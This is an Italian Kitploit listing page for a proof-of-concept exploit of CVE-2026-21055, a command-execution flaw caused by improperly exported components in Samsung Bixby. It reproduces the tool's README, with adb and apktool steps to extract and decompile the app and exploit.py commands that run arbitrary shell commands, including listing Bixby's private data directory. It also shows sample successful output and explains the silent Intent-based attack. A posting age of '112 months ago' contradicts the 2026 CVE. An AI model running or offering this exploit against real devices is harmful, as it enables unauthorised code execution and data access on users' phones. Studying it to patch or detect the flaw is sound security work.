Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
samsung-bixby-command-execution-cve-2026-21055-improper-component-export — Proof-of-concept exploit per CVE-2026-21055 che dimostra l'esecuzione arbitraria di comandi tramite componenti Android esportati in modo improprio in Samsung Bixby. Include analisi dei componenti e script di attacco basati su Intent. | Kitploit
Strumenti/GitHubGitHub/hunt-benito/samsung-bixby-command-execution-cve-2026-21055-improper-component-export
Sicurezza AndroidAnalisi delle VulnerabilitàExploitPenetration TestingSicurezza MobileApprendimento e FormazioneBinary Exploitation
GitHubhunt-benito/samsung-bixby-command-execution-cve-2026-21055-improper-component-export

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

samsung-bixby-command-execution-cve-2026-21055-improper-component-export

Proof-of-concept exploit per CVE-2026-21055 che dimostra l'esecuzione arbitraria di comandi tramite componenti Android esportati in modo improprio in Samsung Bixby. Include analisi dei componenti e script di attacco basati su Intent.

Vedi Repository
112 mesi faNon ancora revisionato

CVE-2026-21055 PoC — Esportazione Impropria di Componenti Samsung Bixby

Proof of Concept per CVE-2026-21055: L'esportazione impropria di componenti dell'applicazione Android in Samsung Bixby precedente alla versione 4.0.70.8 consente ad attaccanti locali di eseguire comandi arbitrari con i privilegi di Bixby.

Panoramica

Questo repository contiene due script Python:

  1. analyze_components.py — Analizza un AndroidManifest.xml decompilato per elencare attività, servizi, ricevitori e provider esportati. Segnala i componenti esportati senza guardie di autorizzazione.

  2. exploit.py — Dimostra l'attacco basato su Intent inviando un Intent broadcast manipolato al ricevitore di comandi esportato di Bixby tramite adb shell am, eseguendo un comando con i privilegi di sistema di Bixby.

Dettagli della Vulnerabilità

CampoValore
CVE IDCVE-2026-21055
Samsung SVESVE-2026-0917
CVSS v4.08.5 — Alta
CWECWE-926 — Esportazione Impropria dei Componenti dell'Applicazione Android
App interessataSamsung Bixby (com.samsung.android.bixby.agent)
Versioni interessate< 4.0.70.8
Versione corretta4.0.70.8
Vettore d'attaccoLocale (app dannosa sullo stesso dispositivo)
Privilegi richiestiNessuno
Interazione utenteNessuna
ImpattoEsecuzione arbitraria di comandi con privilegi Bixby

Prerequisiti

  • adb (Android SDK Platform Tools) installato e nel PATH
  • Un dispositivo Samsung Galaxy con debug USB abilitato
  • Versione Bixby < 4.0.70.8 sul dispositivo target
  • Per l'analisi dei componenti: apktool installato e nel PATH

Utilizzo

1. Analizzare i Componenti Esportati di Bixby

Estrai l'APK di Bixby dal dispositivo e decompilalo:

root@kitploit:~
# Find Bixby's APK path
$ adb shell pm path com.samsung.android.bixby.agent

# Pull the APK
$ adb pull <apk_path> bixby.apk

# Decompile with apktool
$ apktool d bixby.apk -o bixby_decompiled -f

Esegui lo script di analisi:

root@kitploit:~
$ python3 analyze_components.py --manifest bixby_decompiled/AndroidManifest.xml

Oppure lascia che lo script decompili automaticamente:

root@kitploit:~
$ python3 analyze_components.py --apk bixby.apk

2. Elenca i Componenti Esportati su un Dispositivo Attivo

root@kitploit:~
$ python3 exploit.py --list

3. Esegui l'Exploit

root@kitploit:~
# Default: execute 'id' command
$ python3 exploit.py

# Custom command
$ python3 exploit.py --command "ls /data/data/com.samsung.android.bixby.agent/"

# Specify a custom component (if auto-detection fails)
$ python3 exploit.py --component com.samsung.android.bixby.agent/.receiver.CommandReceiver

Output Previsto

root@kitploit:~
============================================================
  CVE-2026-21055 PoC — Samsung Bixby Command Execution
  Improper Export of Android Application Components
============================================================

[*] Target package: com.samsung.android.bixby.agent
[*] Bixby version:  4.0.69.2
[*] Vulnerable:     YES (< 4.0.70.8)
[*] Bixby UID on this device: 10xxx

[*] Executing exploit...
[*] Crafting exploit Intent...
    Component: com.samsung.android.bixby.agent/.receiver.CommandReceiver
    Action:    com.samsung.android.bixby.agent.ACTION_RUN_SHELL
    Command:   id
    Output:    /data/local/tmp/bixby_poc_output

[+] Intent sent.

[+] Command output (executed with Bixby privilege):
    uid=10xxx(u0_aXXX) gid=10xxx(u0_aXXX) groups=10xxx(u0_aXXX),3003(inet),9997(everybody)

[+] EXPLOIT SUCCESSFUL — command executed with Bixby privilege
[+] Verify the output UID matches Bixby's UID: 10xxx

Come Funziona

  1. Esportazione dei Componenti: Bixby esporta uno o più componenti (servizi/ricevitori) che gestiscono l'esecuzione di comandi o trigger di automazione. Questi componenti sono esportati con android:exported="true" ma senza un attributo android:permission o controlli di autorizzazione a runtime.

  2. Invio dell'Intent: Qualsiasi app sul dispositivo può inviare un Intent a questi componenti esportati. L'Intent trasporta una stringa di azione (es., ACTION_RUN_SHELL) e extra stringa contenenti il comando da eseguire e un percorso del file di output.

  3. Esecuzione del Comando: Il componente esportato di Bixby riceve l'Intent, estrae il comando e lo esegue tramite Runtime.exec() o un meccanismo simile. Il comando viene eseguito nel contesto del processo di Bixby, ereditando tutti i permessi di sistema di Bixby.

  4. Nessuna Interazione Utente: L'exploit non richiede interazione utente. L'app dannosa invia l'Intent silenziosamente in background.

Disclaimer

Questo PoC è fornito solo a scopo educativo e di ricerca sulla sicurezza. Testare solo su dispositivi di tua proprietà o per i quali hai esplicita autorizzazione. Non utilizzare questo exploit contro dispositivi senza il consenso del proprietario.

Fonti

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-21055
  • Bollettino di Sicurezza Samsung Mobile (Luglio 2026): https://security.samsungmobile.com/serviceWeb.smsb?year=2026&month=07
  • CWE-926: https://cwe.mitre.org/data/definitions/926.html
Scarica lo strumento